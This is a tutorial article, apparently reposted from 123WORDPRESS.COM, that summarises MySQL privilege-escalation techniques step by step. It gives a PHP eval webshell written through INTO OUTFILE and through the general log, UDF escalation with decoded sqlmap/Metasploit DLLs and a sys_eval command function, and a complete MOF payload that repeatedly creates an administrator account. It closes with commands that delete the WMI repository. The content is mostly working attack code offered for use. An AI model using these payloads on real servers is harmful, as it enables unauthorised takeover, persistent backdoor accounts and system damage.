Summary of various postures of MySQL privilege escalation

1. Write Webshell

into outfile write shell

Prerequisites:

1. Know the physical path of the website

2. High-privilege database users

3. load_file() is enabled, that is, secure_file_priv is unlimited

4. The website path has write permission

First, the basic syntax queries whether secure_file_priv has no restrictions

show global variables like '%secure_file_priv%'; 

Before MySQL 5.5, secure_file_priv was empty by default, in which case you could write files to any absolute path.

After MySQL 5.5, secure_file_priv defaults to NULL, in which case files cannot be written.

If all the above conditions are met, you can try to use the following SQL statement to write directly to the shell:

select '<?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php'; 

Check the target path and find that the shell.php file has been written

Upper kitchen knife connection

Log file write shell

Prerequisites:

1. Web folder loose permissions can be written

2. Windows

3. Run MySQL or Apache with high privileges

MySQL 5.0 and above will create a log file, which can be modified by modifying the global variables of the log to getshell

View the log directory

SHOW VARIABLES LIKE 'general%'; 

general_log is disabled by default. Enabling it will record every command entered by the user and save it in the corresponding log file.
You can try to customize the log file and write content to the log file, then you can successfully getshell:

Changing the log file location

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

View the current log configuration

Check the target directory and write the log.php file

Write to shell

select '<?php @eval($_POST[cmd]); ?>' 

On the kitchen knife, connect

2. UDF Privilege Escalation

A custom function is an extension of database functionality. Users can use custom functions to implement functions that are not easily implemented in MySQL. The newly added functions can be called in SQL statements, just like calling the native function version().

Dynamic Link Library

If the version is MySQL >= 5.1, the UDF dynamic link library file must be placed in the lib\plugin folder under the MySQL installation directory before creating a custom function.

So where do you find the dynamic link library files? In fact, our commonly used tools sqlmap and Metasploit both come with dynamic link library files for the corresponding systems.

sqlmap UDF dynamic link library file location

sqlmap root directory/data/udf/mysql

However, these dynamic link libraries included in sqlmap have been coded to prevent accidental killing and cannot be used directly. However, you can use the decoding tool cloak.py that comes with sqlmap to decode it. The location of cloak.py is: sqlmap root directory/extra/cloak/cloak.py.

The decoding method is as follows:

Decoding 32-bit Windows dynamic link library:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

Other Linux and Windows dynamic link library decoding is similar

Or directly use the dynamic link library that comes with metasploit without decoding

Metasploit UDF dynamic link library file location

The next task is to put the UDF dynamic link library file into the MySQL plugin directory. How to find this directory? You can use the following SQL statement to query:

show variables like '%plugin%'

Write dynamic link library

When secure_file_priv is unlimited, we can manually write files to the plugin directory

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll') into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

Create a custom function and call the command

Creating a custom function

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; 

Check whether sys_eval is added

Then you can execute system commands through the created function:

Deleting a custom function

drop function sys_eval;

3. MOF Privilege Escalation

Mof privilege escalation principle

The principle of mof privilege escalation is actually very simple. It uses the nullevt.mof file in the c:/windows/system32/wbem/mof/ directory to execute once every minute at a specific time to write our cmd command for execution.

Strict prerequisites:

1. Windows 03 and below

2. The mysql startup identity has permission to read and write the c:/windows/system32/wbem/mof directory

3. The secure-file-priv parameter is not null

Privilege Escalation Process:

The MOF file will be executed every five seconds, and it is a system permission. We use load_file through mysql to write the file to /wbme/mof, and then the system will execute the MOF we uploaded every five seconds. There is a vbs script in MOF. We can control the content of this vbs script to let the system execute commands and elevate privileges.

The exploit code is as follows (test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent"
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF file utilization:

Upload the above script to a directory with read and write permissions:

Here I uploaded it to C:\soft\, and we use SQL statements to import the file into c:/windows/system32/wbem/mof/

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

Verify privilege escalation:

When we successfully export mof, mof will be executed directly and a user will be created every 5 seconds.

About the Disadvantages of MOF Privilege Escalation

After we successfully escalate the privileges, even if the account is deleted, mof will rebuild the original account within five seconds. This will cause great trouble for us to exit the test, so use it with caution. So how do we delete our hacked account?

Run the following statement in cmd:

#Stop the winmgmt service net stop winmgmt

#Delete the Repository folder rmdir /s /q C:\Windows\system32\wbem\Repository\

# Manually delete the mof file del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# Delete the created user net user hpdoger /delete

#Restart the service net start winmgmt

Summarize

This is the end of this article about MySQL privilege escalation techniques. For more information about MySQL privilege escalation techniques, please search for previous articles on 123WORDPRESS.COM or continue to browse the following related articles. I hope you will support 123WORDPRESS.COM in the future!